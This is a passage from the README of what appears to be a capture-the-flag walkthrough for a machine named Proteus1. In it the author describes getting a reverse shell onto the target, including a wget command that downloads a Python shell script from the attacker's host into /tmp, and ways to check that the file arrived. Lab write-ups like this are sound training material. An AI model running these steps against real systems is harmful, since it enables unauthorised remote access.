jlreiter/Proteus1/README.md

 Now we can try to put a reverse shell in.
 The current account doesn't have write access to the web directory, so I needed to put it somewhere else. wget supports this with -O. `wget -O /tmp/simpleshell.py http://<IP ADDR>/simpleshell.py` Encode it, send it, and double check the file was recieved.
 You can always look at your own apache access.log to see if the GET was successful, or you can 'ls' the /tmp directory.
-If you check the /tmp directory with permissions, you can see they were nice enough to even grant our shell execute permissions.

 ![already_exec_shell](https://github.com/jlreiter/Proteus1/blob/master/imgs/already_executable_shell.png)